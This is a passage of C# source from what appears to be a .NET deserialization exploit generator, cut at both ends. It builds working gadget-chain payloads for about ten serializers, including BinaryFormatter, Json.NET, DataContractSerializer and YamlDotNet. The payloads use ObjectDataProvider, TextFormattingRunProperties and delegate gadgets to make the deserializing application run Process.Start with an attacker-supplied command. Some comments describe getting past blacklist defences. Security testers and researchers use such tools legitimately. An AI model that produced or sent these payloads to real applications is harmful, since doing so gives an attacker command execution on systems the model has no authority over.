CgAAAA=='},{'orderId':24,'typeBytes':'EQ==','valueBytes':'CQAAAAIAAAA='},{'orderId':25,'typeBytes':'" + obj25Type + @"','valueBytes':'" + obj25Value + @"'},{'orderId':26,'typeBytes':'Bg==','valueBytes':'" + obj26Value + @"'},{'orderId':27,'typeBytes':'BA==','valueBytes':'CgAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVy'},{'orderId':28,'typeBytes':'CQ==','valueBytes':'DQAAAA=='},{'orderId':29,'typeBytes':'CQ==','valueBytes':'DgAAAA=='},{'orderId':30,'typeBytes':'CQ==','valueBytes':'DwAAAA=='},{'orderId':31,'typeBytes':'BA==','valueBytes':'DQAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQ=='},{'orderId':32,'typeBytes':'Bg==','valueBytes':'EAAAAKQBU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZyxtc2NvcmxpYl0sW1N5c3RlbS5TdHJpbmcsbXNjb3JsaWJdLFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyxTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0='},{'orderId':33,'typeBytes':'Bg==','valueBytes':'EQAAAAhtc2NvcmxpYg=='},{'orderId':34,'typeBytes':'Cg==','valueBytes':''},{'orderId':35,'typeBytes':'Bg==','valueBytes':'EgAAAEZTeXN0ZW0sVmVyc2lvbj00LjAuMC4wLEN1bHR1cmU9bmV1dHJhbCxQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5'},{'orderId':36,'typeBytes':'Bg==','valueBytes':'EwAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcw=='},{'orderId':37,'typeBytes':'Bg==','valueBytes':'FAAAAAVTdGFydA=='},{'orderId':38,'typeBytes':'CQ==','valueBytes':'FQAAAA=='},{'orderId':39,'typeBytes':'BA==','valueBytes':'DgAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgYAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAAMIDVN5c3RlbS5UeXBlW10='},{'orderId':40,'typeBytes':'CQ==','valueBytes':'FAAAAA=='},{'orderId':41,'typeBytes':'CQ==','valueBytes':'EgAAAA=='},{'orderId':42,'typeBytes':'CQ==','valueBytes':'EwAAAA=='},{'orderId':43,'typeBytes':'Bg==','valueBytes':'GQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQ=='},{'orderId':44,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':45,'typeBytes':'Cg==','valueBytes':''},{'orderId':46,'typeBytes':'AQ==','valueBytes':'DwAAAA4AAAA='},{'orderId':47,'typeBytes':'Bg==','valueBytes':'GgAAAAdDb21wYXJl'},{'orderId':48,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':49,'typeBytes':'Bg==','valueBytes':'HAAAAA1TeXN0ZW0uU3RyaW5n'},{'orderId':50,'typeBytes':'Bg==','valueBytes':'HQAAACtJbnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcp'},{'orderId':51,'typeBytes':null,'valueBytes':'CAAAAA=='},{'orderId':52,'typeBytes':'Cg==','valueBytes':''},{'orderId':53,'typeBytes':'AQ==','valueBytes':'FQAAAA0AAAA='},{'orderId':54,'typeBytes':'Bg==','valueBytes':'HgAAAC1TeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0='},{'orderId':55,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':56,'typeBytes':'Cg==','valueBytes':''},{'orderId':57,'typeBytes':'CQ==','valueBytes':'EQAAAA=='},{'orderId':58,'typeBytes':'CQ==','valueBytes':'HAAAAA=='},{'orderId':59,'typeBytes':'CQ==','valueBytes':'GgAAAA=='},{'orderId':60,'typeBytes':'Cg==','valueBytes':''},{'orderId':61,'typeBytes':'Cw==','valueBytes':''}]}"; bfSerializedObj = SimpleBinaryFormatterParser.JsonToStream(payload).ToArray(); } else { // This is an example of using AdvancedBinaryFormatterParser which is recommended over SimpleBinaryFormatterParser but it is much longer // In this gadget however, this feels like cheating as System.Resources.ResourceSet can be replaced by anything given the TextFormattingRunProperties gadget triggers first ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator(); string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString(); if (inputArgs.Minify) { xaml_payload = XMLMinifier.Minify(xaml_payload, null, null); } xaml_payload = CommandArgSplitter.JsonStringEscape(xaml_payload); // This payload has been minified manually too by removing some of the unnecessary items! payload = @"[{'Id': 1, 'Data': { '$type': 'SerializationHeaderRecord', 'binaryFormatterMajorVersion': 1, 'binaryFormatterMinorVersion': 0, 'binaryHeaderEnum': 0, 'topId': 1, 'headerId': -1, 'majorVersion': 1, 'minorVersion': 0 }},{'Id': 2, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 1, 'name': 'System.Resources.ResourceSet', 'numMembers': 2, 'memberNames':['',''], 'binaryTypeEnumA':[3,3], 'typeInformationA':[null,null], 'typeInformationB':['',''], 'memberAssemIds':[0,0], 'assemId': 0 }},{'Id': 3, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 2 }},{'Id': 4, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 5, 'TypeName': 'ObjectWithMapTyped', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 4, 'objectId': 2, 'name': 'System.Collections.Hashtable', 'numMembers': 5, 'memberNames':['LoadFactor','Version','Comparer','','HashSize'], 'binaryTypeEnumA':[0,0,3,3,0], 'typeInformationA':[11,8,null,null,8], 'typeInformationB':[11,8,'','',8], 'memberAssemIds':[0,0,0,0,0], 'assemId': 0 }},{'Id': 6, 'TypeName': 'Single', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 11, 'value': 0 }},{'Id': 7, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 1 }},{'Id': 8, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 9, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 1 }},{'Id': 10, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 3 }},{'Id': 11, 'TypeName': 'Assembly', 'Data': { '$type': 'BinaryAssembly', 'assemId': 7, 'assemblyString': 'Microsoft.PowerShell.Editor' }},{'Id': 12, 'TypeName': 'ObjectWithMapTypedAssemId', 'Data': { '$type': 'BinaryObjectWithMapTyped', 'binaryHeaderEnum': 5, 'objectId': 6, 'name': 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties', 'numMembers': 1, 'memberNames':['ForegroundBrush'], 'binaryTypeEnumA':[1], 'typeInformationA':[null], 'typeInformationB':[null], 'memberAssemIds':[0], 'assemId': 7 }},{'Id': 13, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 8, 'value': '" + xaml_payload + @"' }},{'Id': 14, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]"; bfSerializedObj = AdvancedBinaryFormatterParser.JsonToStream(payload).ToArray(); } if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase)) { if (inputArgs.Test) { try { MemoryStream ms = new MemoryStream(bfSerializedObj); ms.Position = 0; System.Runtime.Serialization.Formatters.Binary.BinaryFormatter bf = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter(); bf.Deserialize(ms); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(bfSerializedObj); } else { // it is LosFormatter byte[] lfSerializedObj = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(bfSerializedObj); MemoryStream ms = new MemoryStream(lfSerializedObj); ms.Position = 0; if (inputArgs.Test) { try { System.Web.UI.LosFormatter lf = new System.Web.UI.LosFormatter(); lf.Deserialize(ms); } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(lfSerializedObj); } //return Serialize(myResourceSet, formatter, inputArgs); } else if (formatter.Equals("netdatacontractserializer", StringComparison.OrdinalIgnoreCase)) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; string ndcPayload = ""; if (internalgadget == 1) { string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "<c:string>" + inputArgs.CmdArguments + "</c:string><c:string>" + inputArgs.CmdFileName + "</c:string>"; } else { cmdPart = @"<c:string a:nil=""true""/><c:string>" + inputArgs.CmdFileName + "</c:string>"; } ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""System.Collections.Generic.SortedSet`1[[System.String,mscorlib]]"" b:Assembly=""System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089""><Count b:Type=""System.Int32"" b:Assembly=""0"">2</Count><Comparer b:Type=""System.Collections.Generic.ComparisonComparer`1[[System.String,mscorlib]]"" b:Assembly=""0""><_comparison b:FactoryType=""d:DelegateSerializationHolder"" b:Type=""System.DelegateSerializationHolder"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Collections.Generic"" xmlns:d=""http://schemas.datacontract.org/2004/07/System""><Delegate b:Type=""System.DelegateSerializationHolder+DelegateEntry"" b:Assembly=""0"" xmlns=""""><d:assembly b:Id=""1"">mscorlib</d:assembly><d:delegateEntry><d:assembly b:Ref=""1"" a:nil=""1""/><d:delegateEntry a:nil=""1""/><d:methodName b:Id=""2"">Compare</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Ref=""1"" a:nil=""1""/><d:targetTypeName b:Id=""3"">System.String</d:targetTypeName><d:type>System.Comparison`1[[System.String,mscorlib]]</d:type></d:delegateEntry><d:methodName b:Id=""4"">Start</d:methodName><d:target a:nil=""1""/><d:targetTypeAssembly b:Id=""5"">System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089</d:targetTypeAssembly><d:targetTypeName b:Id=""6"">System.Diagnostics.Process</d:targetTypeName><d:type>System.Func`3[[System.String,mscorlib],[System.String,mscorlib],[System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089]]</d:type></Delegate><method0 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""4"" a:nil=""1""/><AssemblyName b:Ref=""5"" a:nil=""1""/><ClassName b:Ref=""6"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">System.Diagnostics.Process Start(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType><GenericArguments a:nil=""1""/></method0><method1 b:FactoryType=""e:MemberInfoSerializationHolder"" b:Type=""System.Reflection.MemberInfoSerializationHolder"" b:Assembly=""0"" xmlns=""""><Name b:Ref=""2"" a:nil=""1""/><AssemblyName b:Ref=""1"" a:nil=""1""/><ClassName b:Ref=""3"" a:nil=""1""/><Signature b:Type=""System.String"" b:Assembly=""0"">Int32 Compare(System.String, System.String)</Signature><MemberType b:Type=""System.Int32"" b:Assembly=""0"">8</MemberType></method1></_comparison></Comparer><Version b:Type=""System.Int32"" b:Assembly=""0"">2</Version><Items b:Type=""System.String[]"" b:Assembly=""0"" b:Size=""2"">" + cmdPart + @"</Items></c:anyType></Values></Table></w>"; } else { ObjectDataProviderGenerator myObjectDataProviderGenerator = new ObjectDataProviderGenerator(); string xaml_payload = myObjectDataProviderGenerator.GenerateWithNoTest("xaml", inputArgs).ToString(); if (inputArgs.Minify) { xaml_payload = XMLMinifier.Minify(xaml_payload, null, null); } ndcPayload = @"<w b:Type=""System.Resources.ResourceSet"" b:Assembly=""0"" xmlns=""http://schemas.datacontract.org/2004/07/System.Resources"" xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/""><Table b:Type=""System.Collections.Hashtable"" b:Assembly=""0"" xmlns:c=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""><LoadFactor b:Type=""System.Single"" b:Assembly=""0"" xmlns="""">0</LoadFactor><Version b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">1</Version><HashSize b:Type=""System.Int32"" b:Assembly=""0"" xmlns="""">3</HashSize><Values b:Type=""System.Object[]"" b:Assembly=""0"" b:Size=""1"" xmlns=""""><c:anyType b:Type=""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"" b:Assembly=""Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35""><ForegroundBrush b:Type=""System.String"" b:Assembly=""0""><![CDATA[" + xaml_payload + @"]]></ForegroundBrush></c:anyType></Values></Table></w>"; //</Values></Table></w> can also be removed to make it even shorter! Why? IDK atm! } if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { ndcPayload = XMLMinifier.Minify(ndcPayload, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true); } else { ndcPayload = XMLMinifier.Minify(ndcPayload, null, new string[] { "</Values></Table></w>" }, FormatterType.NetDataContractXML, true); } } if (inputArgs.Test) { try { SerializersHelper.NetDataContractSerializer_deserialize(ndcPayload); /* * MemoryStream ms = new MemoryStream(Encoding.UTF8.GetBytes(ndcPayload)); * ms.Position = 0; * ndcs.Deserialize(ms); */ } catch (Exception err) { Debugging.ShowErrors(inputArgs, err); } } return(ndcPayload); //return Serialize(myResourceSet, formatter, inputArgs); } else { throw new Exception("Formatter not supported"); } }
public override object Generate(string formatter, InputArgs inputArgs) { // NOTE: What is Xaml2? Xaml2 uses ResourceDictionary in addition to just using ObjectDataProvider as in Xaml if (formatter.ToLower().Equals("xaml") || formatter.ToLower().Equals("xaml2")) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = inputArgs.CmdFileName; if (inputArgs.HasArguments) { psi.Arguments = inputArgs.CmdArguments; } StringDictionary dict = new StringDictionary(); psi.GetType().GetField("environmentVariables", BindingFlags.Instance | BindingFlags.NonPublic).SetValue(psi, dict); Process p = new Process(); p.StartInfo = psi; ObjectDataProvider odp = new ObjectDataProvider(); odp.MethodName = "Start"; odp.IsInitialLoadEnabled = false; odp.ObjectInstance = p; string payload = ""; if (formatter.ToLower().Equals("xaml2")) { ResourceDictionary myResourceDictionary = new ResourceDictionary(); myResourceDictionary.Add("", odp); payload = XamlWriter.Save(myResourceDictionary); } else { payload = XamlWriter.Save(odp); } if (inputArgs.Minify) { // using discardable regex array to make it shorter! payload = XMLMinifier.Minify(payload, null, new String[] { @"StandardErrorEncoding=.*LoadUserProfile=""False"" ", @"IsInitialLoadEnabled=""False"" " }); } if (inputArgs.Test) { try { SerializersHelper.Xaml_deserialize(payload); } catch { } } return(payload); } if (formatter.ToLower().Equals("json.net")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; string cmdPart = ""; if (inputArgs.HasArguments) { cmdPart = "'" + inputArgs.CmdFileName + "', '" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':[" + cmdPart + @"] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} }"; if (inputArgs.Minify) { if (inputArgs.UseSimpleType) { payload = JSONMinifier.Minify(payload, new String[] { "PresentationFramework", "mscorlib", "System" }, null); } else { payload = JSONMinifier.Minify(payload, null, null); } } if (inputArgs.Test) { try { SerializersHelper.JsonNet_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("fastjson")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""",""Arguments"":""" + inputArgs.CmdArguments + @""""; } else { cmdPart = @"""FileName"":""" + inputArgs.CmdFileName + @""""; } String payload = @"{ ""$types"":{ ""System.Windows.Data.ObjectDataProvider, PresentationFramework, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = 31bf3856ad364e35"":""1"", ""System.Diagnostics.Process, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""2"", ""System.Diagnostics.ProcessStartInfo, System, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b77a5c561934e089"":""3"" }, ""$type"":""1"", ""ObjectInstance"":{ ""$type"":""2"", ""StartInfo"":{ ""$type"":""3"", " + cmdPart + @" } }, ""MethodName"":""Start"" }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { var instance = JSON.ToObject <Object>(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("javascriptserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.JSON; String cmdPart; if (inputArgs.HasArguments) { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "', 'Arguments':'" + inputArgs.CmdArguments + "'"; } else { cmdPart = "'FileName':'" + inputArgs.CmdFileName + "'"; } String payload = @"{ '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'ObjectInstance':{ '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', 'StartInfo': { '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = JSONMinifier.Minify(payload, null, null); } if (inputArgs.Test) { try { SerializersHelper.JavaScriptSerializer_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("xmlserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" > <ExpandedElement/> <ProjectedProperty0> <MethodName>Parse</MethodName> <MethodParameters> <anyType xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xsi:type=""xsd:string""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </MethodParameters> <ObjectInstance xsi:type=""XamlReader""></ObjectInstance> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProvider> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.XMLSerializer, true); } if (inputArgs.Test) { try { SerializersHelper.XMLSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer2")) { // This by mixing what we had already in xmlserializer and datacontractserializer // this can be useful to bypass deserializers that are based on a blacklist inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"" xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/""> <ExpandedElement z:Id=""ref1"" > <__identity xsi:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Parse</a:MethodName> <a:MethodParameters> <anyType xsi:type=""xsd:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">{cmdPart}</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]> </anyType> </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfXamlReaderObjectDataProviderRexb2zZW> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("datacontractserializer")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<b:anyType i:type=""c:string"">" + inputArgs.CmdFileName + @"</b:anyType> <b:anyType i:type=""c:string"">" + inputArgs.CmdArguments + "</b:anyType>"; } else { cmdPart = $@"<anyType i:type=""c:string"" xmlns=""http://schemas.microsoft.com/2003/10/Serialization/Arrays"">" + inputArgs.CmdFileName + @"</anyType>"; } String payload = $@"<?xml version=""1.0""?> <root type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""> <ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns=""http://schemas.datacontract.org/2004/07/System.Data.Services.Internal"" xmlns:c=""http://www.w3.org/2001/XMLSchema"" xmlns:i=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:z=""http://schemas.microsoft.com/2003/10/Serialization/"" > <ExpandedElement z:Id=""ref1"" > <__identity i:nil=""true"" xmlns=""http://schemas.datacontract.org/2004/07/System""/> </ExpandedElement> <ProjectedProperty0 xmlns:a=""http://schemas.datacontract.org/2004/07/System.Windows.Data""> <a:MethodName>Start</a:MethodName> <a:MethodParameters xmlns:b=""http://schemas.microsoft.com/2003/10/Serialization/Arrays""> " + cmdPart + @" </a:MethodParameters> <a:ObjectInstance z:Ref=""ref1""/> </ProjectedProperty0> </ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> </root> "; if (inputArgs.Minify) { payload = XMLMinifier.Minify(payload, null, null, FormatterType.DataContractXML, true); } if (inputArgs.Test) { try { SerializersHelper.DataContractSerializer_deserialize(payload, null, "root"); } catch { } } return(payload); } else if (formatter.ToLower().Equals("yamldotnet")) { inputArgs.CmdType = CommandArgSplitter.CommandType.YamlDotNet; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"FileName: " + inputArgs.CmdFileName + @", Arguments: " + inputArgs.CmdArguments; } else { cmdPart = $@"FileName: " + inputArgs.CmdFileName; } String payload = @" !<!System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35> { MethodName: Start, ObjectInstance: !<!System.Diagnostics.Process,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { StartInfo: !<!System.Diagnostics.ProcessStartInfo,System,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089> { " + cmdPart + @" } } }"; if (inputArgs.Minify) { payload = YamlDocumentMinifier.Minify(payload); } if (inputArgs.Test) { try { SerializersHelper.YamlDotNet_deserialize(payload); } catch { } } return(payload); } else if (formatter.ToLower().Equals("fspickler")) { inputArgs.CmdType = CommandArgSplitter.CommandType.XML; String cmdPart; if (inputArgs.HasArguments) { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String><b:String>{inputArgs.CmdArguments}</b:String>"; } else { cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{inputArgs.CmdFileName}</b:String>"; } String internalPayload = @"<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{d:Type c:Process}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>"; internalPayload = CommandArgSplitter.JsonStringEscape(internalPayload); String payload = @"{ ""FsPickler"": ""4.0.0"", ""type"": ""System.Object"", ""value"": { ""_flags"": ""subtype"", ""subtype"": { ""Case"": ""NamedType"", ""Name"": ""Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties"", ""Assembly"": { ""Name"": ""Microsoft.PowerShell.Editor"", ""Version"": ""3.0.0.0"", ""Culture"": ""neutral"", ""PublicKeyToken"": ""31bf3856ad364e35"" } }, ""instance"": { ""serializationEntries"": [ { ""Name"": ""ForegroundBrush"", ""Type"": { ""Case"": ""NamedType"", ""Name"": ""System.String"", ""Assembly"": { ""Name"": ""mscorlib"", ""Version"": ""4.0.0.0"", ""Culture"": ""neutral"", 